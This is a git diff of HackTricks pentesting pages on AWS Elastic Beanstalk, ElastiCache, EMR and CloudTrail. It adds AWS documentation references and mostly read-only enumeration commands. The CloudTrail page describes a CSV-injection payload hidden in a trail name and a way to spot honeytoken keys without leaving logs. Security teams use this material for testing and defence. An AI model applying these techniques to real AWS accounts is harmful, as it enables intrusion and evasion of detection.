 >
-> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed.
+> **Write access alone does not change a running environment.** If a later deployment consumes a modified source bundle, however, the altered application can execute with the environment's attached instance-profile permissions.<sup>[[8]](#references)[[16]](#references)[[19]](#references)</sup>
 
 ### Enumeration
+
+The AWS CLI exposes read-only `describe` operations for Elastic Beanstalk applications, versions, environments, configuration, environment resources, instance health, and events; the following calls provide a useful inventory starting point.<sup>[[20]](#references)</sup>
 
 ```bash
 # Find S3 bucket
@@ -110,8 +111,27 @@ aws elasticbeanstalk describe-events
 ../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation/README.md
 {{#endref}}
 
+## References
+
+- [1] [AWS Elastic Beanstalk - Overview of Deployment Options on AWS](https://docs.aws.amazon.com/whitepapers/latest/overview-deployment-options/aws-elastic-beanstalk.html)
+- [2] [Elastic Beanstalk Docker platform branches](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/docker-platform.html)
+- [3] [Understanding concepts in Elastic Beanstalk](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html)
+- [4] [Managing Elastic Beanstalk applications](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/applications.html)
+- [5] [Environment types](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features-managing-env-types.html)
+- [6] [Elastic Beanstalk worker environments](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts-worker.html)
+- [7] [Creating an Elastic Beanstalk environment](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features.environments.html)
+- [8] [Managing Elastic Beanstalk instance profiles](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html)
+- [9] [AWSElasticBeanstalkWebTier - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkWebTier.html)
+- [10] [AWSElasticBeanstalkMulticontainerDocker - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkMulticontainerDocker.html)
+- [11] [AWSElasticBeanstalkWorkerTier - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkWorkerTier.html)
+- [12] [Elastic Beanstalk service role](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts-roles-service.html)
+- [13] [AWSElasticBeanstalkEnhancedHealth - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkEnhancedHealth.html)
+- [14] [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy - AWS Managed Policy](https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy.html)
+- [15] [Configuring the IMDS on your Elastic Beanstalk environment's instances](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environments-cfg-ec2-imds.html)
+- [16] [Using Elastic Beanstalk with Amazon S3](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html)
+- [17] [Your Elastic Beanstalk environment's Domain name](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/customdomains.html)
+- [18] [CreateEnvironment - AWS Elastic Beanstalk API Reference](https://docs.aws.amazon.com/elasticbeanstalk/latest/api/API_CreateEnvironment.html)
+- [19] [Deploying applications to Elastic Beanstalk environments](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features.deploy-existing-version.html)
+- [20] [elasticbeanstalk - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticbeanstalk/)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
@@ -1,35 +1,35 @@
 # AWS - ElastiCache
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## ElastiCache
 
-AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**.
+AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports popular open-source in-memory engines: **Valkey, Redis OSS, and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, including provisioning, patching, and monitoring; backups and snapshots apply to Valkey and Redis OSS rather than Memcached.<sup>[[1]](#references)[[2]](#references)[[11]](#references)</sup>
 
 ### Enumeration
 
+For Valkey and Redis OSS, inspect `AuthTokenEnabled` for AUTH-token protection and inspect users and user groups for RBAC. `describe-cache-clusters` returns security groups and Memcached configuration endpoints; add `--show-cache-node-info` when individual cache-node endpoints are required. `describe-replication-groups` returns primary, reader, and member endpoints.<sup>[[3]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
+
 ```bash
 # ElastiCache clusters
-## Check the SecurityGroups to later check who can access
-## In Redis clusters: Check AuthTokenEnabled to see if you need password
-## In memcache clusters: You can find the URL to connect
-aws elasticache describe-cache-clusters
+## Review SecurityGroups to assess who can access the cluster
+## For Valkey/Redis OSS clusters, inspect AuthTokenEnabled and RBAC user groups
+## In Memcached clusters, inspect the configuration or node endpoint
+aws elasticache describe-cache-clusters --show-cache-node-info
 
-# List all ElastiCache replication groups
-## Find here the accesible URLs for Redis clusters
+# List all Valkey/Redis OSS replication groups
+## Find here the accessible endpoints for Valkey/Redis OSS clusters
 aws elasticache describe-replication-groups
 
-#List all ElastiCache parameter groups
+# List all ElastiCache parameter groups
 aws elasticache describe-cache-parameter-groups
 
-#List all ElastiCache security groups
-## If this gives an error it's because it's using SGs from EC2
+# List legacy ElastiCache cache security groups
+## These apply only to clusters in EC2-Classic; VPC clusters use VPC security groups
 aws elasticache describe-cache-security-groups
 
-#List all ElastiCache subnet groups
+# List all ElastiCache subnet groups
 aws elasticache describe-cache-subnet-groups
 
-# Get snapshots
+# Get Valkey/Redis OSS snapshots
 aws elasticache describe-snapshots
 
 # Get users and groups
@@ -40,10 +40,25 @@ aws elasticache describe-users
 aws elasticache describe-events
 ```
 
+The remaining commands retrieve parameter-group descriptions, legacy cache-security-group descriptions, VPC subnet-group descriptions, Valkey/Redis OSS snapshots, users and user groups, and ElastiCache events.<sup>[[8]](#references)[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)</sup>
+
 ### Privesc (TODO)
 
+## References
+
+- [1] [What is Amazon ElastiCache? - Amazon ElastiCache](https://docs.aws.amazon.com/AmazonElastiCache/latest/dg/WhatIs.html)
+- [2] [How ElastiCache works - Amazon ElastiCache](https://docs.aws.amazon.com/AmazonElastiCache/latest/dg/WhatIs.corecomponents.html)
+- [3] [Finding connection endpoints in ElastiCache - Amazon ElastiCache](https://docs.aws.amazon.com/AmazonElastiCache/latest/dg/Endpoints.html)
+- [4] [describe-cache-clusters — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-cache-clusters.html)
+- [5] [describe-replication-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-replication-groups.html)
+- [6] [Authenticating with the Valkey and Redis OSS AUTH command - Amazon ElastiCache](https://docs.aws.amazon.com/AmazonElastiCache/latest/dg/auth.html)
+- [7] [Role-Based Access Control (RBAC) - Amazon ElastiCache](https://docs.aws.amazon.com/AmazonElastiCache/latest/dg/Clusters.RBAC.html)
+- [8] [describe-cache-parameter-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-cache-parameter-groups.html)
+- [9] [describe-cache-security-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-cache-security-groups.html)
+- [10] [describe-cache-subnet-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-cache-subnet-groups.html)
+- [11] [describe-snapshots — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-snapshots.html)
+- [12] [describe-user-groups — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-user-groups.html)
+- [13] [describe-users — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-users.html)
+- [14] [describe-events — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticache/describe-events.html)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
@@ -1,40 +1,37 @@
 # AWS - EMR Enum
 
-{{#include ../../../banners/hacktricks-training.md}}
-
 ## EMR
 
-AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark.
+Amazon Elastic MapReduce (Amazon EMR) is a managed cluster platform for running big-data frameworks such as Apache Hadoop and Apache Spark; an EMR cluster is a collection of Amazon EC2 instances. Starting with EMR release 4.8.0, security configurations can specify data-at-rest and data-in-transit encryption for the cluster.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 Key characteristics include:
 
-- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features:
-  - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider.
-  - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop:
-    - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer.
-    - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm.
-- **Encryption in Transit**: Focuses on securing data during transfer. Options include:
-  - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider:
-    - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket.
-    - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts.
+- **Cluster Encryption Default**: If omitted from a security configuration, `EnableAtRestEncryption` and `EnableInTransitEncryption` default to `false`. At-rest encryption can cover EMRFS data in Amazon S3, local disks, or both.<sup>[[3]](#references)[[4]](#references)</sup>
+  - **Linux Unified Key Setup (LUKS)**: Amazon EMR can use LUKS for attached storage; beginning with EMR 5.24.0, its EBS-encryption option can encrypt the EBS root and attached storage volumes. AWS KMS or a custom provider can supply encryption artifacts; EBS encryption through the security configuration requires AWS KMS.<sup>[[3]](#references)</sup>
+  - **Open-Source HDFS Encryption**: Local disk encryption sets Secure Hadoop RPC to `privacy` using the Simple Authentication and Security Layer (SASL), and enables HDFS block-transfer encryption with AES-256.<sup>[[3]](#references)[[6]](#references)</sup>
+- **Encryption in Transit**: Security configurations enable open-source TLS features for supported applications, with support varying by EMR release.<sup>[[3]](#references)[[6]](#references)</sup>
+  - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider:<sup>[[3]](#references)[[4]](#references)</sup>
+    - **PEM**: Manually create PEM certificates, place `privateKey.pem` and `certificateChain.pem` (and optionally `trustedCertificates.pem`) in a ZIP file, and reference that file in Amazon S3.<sup>[[4]](#references)[[5]](#references)</sup>
+    - **Custom**: Provide a Java certificate-provider class in an Amazon S3 JAR that implements `TLSArtifactsProvider` and supplies the TLS artifacts.<sup>[[4]](#references)[[5]](#references)</sup>
+    - **EMR-managed certificates**: EMR release 7.11.0 and later can create and manage private certificates; releases 4.8.0 through 7.10.0 support the PEM ZIP or custom Java-provider choices.<sup>[[5]](#references)</sup>
 
-Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version:
+Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version.<sup>[[6]](#references)[[8]](#references)</sup>
 
 - **Hadoop**:
-  - Might reduce encrypted shuffle using TLS.
-  - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption.
+  - Hadoop MapReduce encrypted shuffle uses TLS. Secure Hadoop RPC uses `privacy` and SASL (and requires Kerberos), while HDFS block-transfer encryption uses AES-256 when at-rest encryption is enabled.<sup>[[3]](#references)[[6]](#references)[[8]](#references)</sup>
 - **Presto** (EMR version 5.6.0+):
-  - Internal communication between Presto nodes is secured using SSL and TLS.
+  - Internal communication between Presto coordinator and workers uses TLS.<sup>[[6]](#references)[[8]](#references)</sup>
 - **Tez Shuffle Handler**:
-  - Utilizes TLS for encryption.
+  - AWS's EMR in-transit guidance documents TLS for the Tez Shuffle Handler; the exact endpoint coverage is release-specific.<sup>[[6]](#references)[[8]](#references)</sup>
 - **Spark**:
-  - Employs TLS for the Akka protocol.
-  - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service.
-  - External shuffle service is secured with the Simple Authentication Security Layer.
+  - Current EMR documentation lists AES-based encryption for Spark driver, executor, and shuffle endpoints and TLS for the Spark History Server and Spark UI.<sup>[[6]](#references)</sup>
+  - The EMR 5.9.0 release notes record that Spark's block-transfer service changed from 3DES to SSL, so older SASL/3DES descriptions should not be applied to every EMR release.<sup>[[1]](#references)[[7]](#references)</sup>
 
-These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases.
+The encryption mechanisms and supported endpoints are application- and release-specific; consult the EMR in-transit support matrix when assessing a cluster.<sup>[[6]](#references)</sup>
 
 #### Enumeration
+
+The following AWS CLI operations enumerate visible clusters, cluster details, instances and fleets, steps, notebook executions, security configurations, and EMR Studios (including Studio access URLs):<sup>[[9]](#references)[[10]](#references)[[11]](#references)[[12]](#references)[[13]](#references)[[14]](#references)[[15]](#references)[[16]](#references)</sup>
 
 ```bash
 aws emr list-clusters
@@ -55,10 +52,21 @@ aws emr list-studios #Get studio URLs
 
 ## References
 
-- [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/)
+- [1] [Elastic MapReduce (EMR) Encryption - Designing Secure Applications and Architectures Lesson](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/)
+- [2] [What is Amazon EMR?](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-what-is-emr.html)
+- [3] [Encryption options for Amazon EMR](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-data-encryption-options.html)
+- [4] [Create a security configuration with the Amazon EMR console or with the AWS CLI](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-create-security-configuration.html)
+- [5] [Create keys and certificates for data encryption with Amazon EMR](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-encryption-enable.html)
+- [6] [Understanding in-transit encryption](https://docs.aws.amazon.com/emr/latest/ManagementGuide/emr-encryption-support-matrix.html)
+- [7] [Support for Apache Livy, Hue 4.0.1, and Presto 0.184 on Amazon EMR release 5.9.0](https://aws.amazon.com/about-aws/whats-new/2017/10/support-for-apache-livy-hue-4-0-1-and-presto-0-184-on-amazon-emr-release-5-9-0/)
+- [8] [Encrypt data in transit using a TLS custom certificate provider with Amazon EMR](https://aws.amazon.com/blogs/big-data/encrypt-data-in-transit-using-a-tls-custom-certificate-provider-with-amazon-emr/)
+- [9] [AWS CLI list-clusters command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-clusters.html)
+- [10] [AWS CLI describe-cluster command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/describe-cluster.html)
+- [11] [AWS CLI list-instances command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-instances.html)
+- [12] [AWS CLI list-instance-fleets command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-instance-fleets.html)
+- [13] [AWS CLI list-steps command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-steps.html)
+- [14] [AWS CLI list-notebook-executions command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-notebook-executions.html)
+- [15] [AWS CLI list-security-configurations command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-security-configurations.html)
+- [16] [AWS CLI list-studios command reference](https://docs.aws.amazon.com/cli/latest/reference/emr/list-studios.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
@@ -1,5 +1,6 @@
 # AWS - Security & Detection Services
 
-{{#include ../../../../banners/hacktricks-training.md}}
+## References
 
+{{#include ../../../../banners/hacktricks-training.md}}
 

--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
@@ -1,17 +1,15 @@
 # AWS - CloudTrail Enum
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## **CloudTrail**
 
-AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.
+AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, improving security posture, and supporting regulatory compliance.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-Each logged event contains:
+Each logged event contains the following documented fields:<sup>[[3]](#references)</sup>
 
 - The name of the called API: `eventName`
 - The called service: `eventSource`
 - The time: `eventTime`
-- The IP address: `SourceIPAddress`
+- The IP address: `sourceIPAddress`
 - The agent method: `userAgent`. Examples:
   - Signing.amazonaws.com - From AWS Management Console
   - console.amazonaws.com - Root user of the account
@@ -19,51 +17,53 @@ Each logged event contains:
 - The request parameters: `requestParameters`
 - The response elements: `responseElements`
 
-Events are written to a new log file **approximately every 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15 minutes after**.\
-CloudTrail logs can be **aggregated across accounts and across regions.**\
-CloudTrail allows you to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\
-When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
+CloudTrail publishes log files multiple times per hour; delivery takes about 5 minutes on average but is not guaranteed, and delivery timing varies by event type and conditions.<sup>[[4]](#references)[[11]](#references)</sup> CloudSecDocs gives typical estimates of about 5 minutes for management events, 15 minutes for data events, and 30 minutes for Insights events; use these as estimates rather than delivery guarantees.<sup>[[1]](#references)</sup> CloudTrail logs can be **aggregated across accounts and across regions**, including in a central S3 bucket or CloudWatch Logs destination when configured.<sup>[[9]](#references)[[11]](#references)[[12]](#references)</sup>
 
-Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that have access to it, but for additional security you can use SSE with KMS and your own keys.
+CloudTrail log file validation can verify that delivered log files have remained unchanged. When enabled, CloudTrail creates SHA-256 hashes and places them in signed digest files, with a new digest file approximately every hour.<sup>[[6]](#references)[[7]](#references)</sup>
 
-The logs are stored in a **S3 bucket with this name format**:
+Trail event selectors can include management and data events; CloudTrail Insights is configured separately to analyze supported management-event activity.<sup>[[2]](#references)[[14]](#references)</sup>
 
-- **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`**
-- Being the BucketName: **`aws-cloudtrail-logs-<accountid>-<random>`**
-- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**
+Logs are saved in an S3 bucket. CloudTrail encrypts delivered log files; when SSE-KMS is not configured, SSE-S3 is used, while a customer-managed KMS key can provide additional control over access to the ciphertext.<sup>[[8]](#references)</sup>
 
-Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**
+CloudTrail writes objects under a key pattern containing an optional prefix, account ID, `AWSLogs`, `CloudTrail`, Region, and date:<sup>[[4]](#references)</sup>
+
+- **`BucketName/[optional-prefix/]AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD`**
+- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**<sup>[[4]](#references)</sup>
+
+Inside each folder, a log file name follows this format: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**.<sup>[[5]](#references)</sup>
 
 Log File Naming Convention
 
 ![CloudTrail log file naming convention showing account ID, region, timestamp, and unique string fields](<../../../../images/image (122).png>)
 
-Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in:
+Moreover, **digest files (to check file integrity)** are delivered to the **same bucket** under an `AWSLogs/AccountID/CloudTrail-Digest/` path (organization trails can include the organization ID):<sup>[[7]](#references)</sup>
 
 ![CloudTrail digest file S3 path pattern with bucket name, account ID, region, and digest timestamp](<../../../../images/image (195).png>)
 
 ### Aggregate Logs from Multiple Accounts
 
+To centralize logs from multiple accounts in S3, AWS documents creating a destination trail and granting CloudTrail the required cross-account bucket permissions:<sup>[[9]](#references)</sup>
+
 - Create a Trail in the AWS account where you want the log files to be delivered to
 - Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
 - Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
 
-However, even if you can save all the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account.
+CloudTrail can also send trail events to CloudWatch Logs; the scope depends on the trails and organization configuration, so centralization there should be configured and verified rather than assumed.<sup>[[11]](#references)[[12]](#references)</sup>
 
 > [!CAUTION]
 > Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets.
 
 ### CloudTrail from all org accounts into 1
 
-When creating a CloudTrail, it's possible to indicate to activate CloudTrail for all the accounts in the org and get the logs into just 1 bucket:
+An organization trail can activate CloudTrail for all accounts in the organization and deliver their logs to a central bucket:<sup>[[10]](#references)</sup>
 
 <figure><img src="../../../../images/image (200).png" alt=""><figcaption></figcaption></figure>
 
-This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect).
+The organization management or delegated administrator controls the organization trail, which can be multi-Region and can also send events to CloudWatch Logs; protect the centralized destination account and bucket.<sup>[[10]](#references)[[11]](#references)</sup>
 
 ### Log Files Checking
 
-You can check that the logs haven't been altered by running
+You can check that the logs haven't been altered by validating their digest files with the AWS CLI:<sup>[[6]](#references)[[17]](#references)</sup>
 
 ```javascript
 aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]
@@ -71,34 +71,35 @@ aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [-
 
 ### Logs to CloudWatch
 
-**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warn you when suspicious activities are performed.**\
-Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to:
+**CloudTrail can automatically send logs to CloudWatch so you can set filters and alarms that warn you when suspicious activities are performed.** A role is required to let CloudTrail create streams and deliver events; AWS documents the `CloudTrail_CloudWatchLogs_Role` permissions for this integration and recommends the default role when it fits the deployment.<sup>[[12]](#references)[[13]](#references)</sup>
+
+This role will allow CloudTrail to:
 
 - CreateLogStream: Create a CloudWatch Logs log stream
 - PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream
 
 ### Event History
 
-CloudTrail Event History allows you to inspect in a table the logs that have been recorded:
+CloudTrail Event History allows you to inspect recorded management events in a table:<sup>[[2]](#references)</sup>
 
 ![AWS CloudTrail Event history table listing event name, time, source, username, resource type, and resource name](<../../../../images/image (89).png>)
 
 ### Insights
 
-**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.
+**CloudTrail Insights** analyzes API call and API error rates against established baselines and alerts you to unusual activity. API call-rate Insights analyze write management events, while API error-rate Insights analyze read and write management events; for example, an increase in `TerminateInstances` calls may produce an Insight event.<sup>[[14]](#references)</sup>
 
-The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight`
+The Insights events are stored in the same bucket as the CloudTrail logs under `BucketName/AWSLogs/AccountID/CloudTrail-Insight`.<sup>[[4]](#references)</sup>
 
 ### Security
 | Control Name	                       |  Implementation Details                                                                                                                                                                                                                                                                                                                                     |
 | ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
-| CloudTrail Log File Integrity        | <ul><li>Validate if logs have been tampered with (modified or deleted)</li><li><p>Uses digest files (create hash for each file)</p><ul><li>SHA-256 hashing</li><li>SHA-256 with RSA for digital signing</li><li>private key owned by Amazon</li></ul></li><li>Takes 1 hour to create a digest file (done on the hour every hour)</li></ul> |
-| Stop unauthorized access             | <ul><li><p>Use IAM policies and S3 bucket policies</p><ul><li>security team —> admin access</li><li>auditors —> read only access</li></ul></li><li>Use SSE-S3/SSE-KMS to encrypt the logs</li></ul>                                                                                                                                        |
-| Prevent log files from being deleted | <ul><li>Restrict delete access with IAM and bucket policies</li><li>Configure S3 MFA delete</li><li>Validate with Log File Validation</li></ul>                                                                                                                                                                                            |
+| CloudTrail Log File Integrity        | <ul><li>Validate if logs have been tampered with (modified or deleted)</li><li><p>Uses digest files (create hash for each file)</p><ul><li>SHA-256 hashing</li><li>SHA-256 with RSA for digital signing</li><li>private key owned by Amazon</li></ul></li><li>Takes 1 hour to create a digest file (done on the hour every hour)</li></ul><sup>[[6]](#references)[[7]](#references)</sup> |
+| Stop unauthorized access             | <ul><li><p>Use IAM policies and S3 bucket policies</p><ul><li>security team —> admin access</li><li>auditors —> read only access</li></ul></li><li>Use SSE-S3/SSE-KMS to encrypt the logs</li></ul><sup>[[8]](#references)</sup> |
+| Prevent log files from being deleted | <ul><li>Restrict delete access with IAM and bucket policies</li><li>Configure S3 MFA delete</li><li>Validate with Log File Validation</li></ul><sup>[[6]](#references)</sup> |
 
 ## Access Advisor
 
-AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns.
+AWS IAM last-accessed information tracks service access for at least 400 days and uses CloudTrail management events as the authoritative source for API activity. It shows when services were last accessed so administrators can identify unused services and refine overly broad permissions based on observed use.<sup>[[15]](#references)</sup>
 
 > [!TIP]
 > Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them
@@ -108,6 +109,8 @@ AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its i
 ## Actions
 
 ### Enumeration
+
+The AWS CLI exposes CloudTrail operations for trails, event selectors, Insights, and event data stores; common enumeration commands include:<sup>[[16]](#references)</sup>
 
 ```bash
 # Get trails info
@@ -128,8 +131,7 @@ aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id
 
 ### **CSV Injection**
 
-It's possible to perform a CSV injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\
-The following code will generate log entry with a bad Trail name containing the payload:
+CloudTrail events can contain an attacker-controlled trail name; if that value is exported to CSV and opened in Excel, a formula payload can be interpreted as a spreadsheet command.<sup>[[20]](#references)</sup> The following code generates a log entry with a trail name containing such a payload:
 
 ```python
 import boto3
@@ -148,27 +150,27 @@ For more information about CSV Injections check the page:
 https://book.hacktricks.wiki/en/pentesting-web/formula-csv-doc-latex-ghostscript-injection.html
 {{#endref}}
 
-For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/)
+For more information about this specific technique, check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/).<sup>[[20]](#references)</sup>
 
 ## **Bypass Detection**
 
 ### HoneyTokens **bypass**
 
-Honeytokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key.
+Honeytokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**; if something triggers an action with that key, then someone must have stolen that key.
 
-However, honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making CloudTrail create any log, **you could know if the key is a honeytoken or not**.
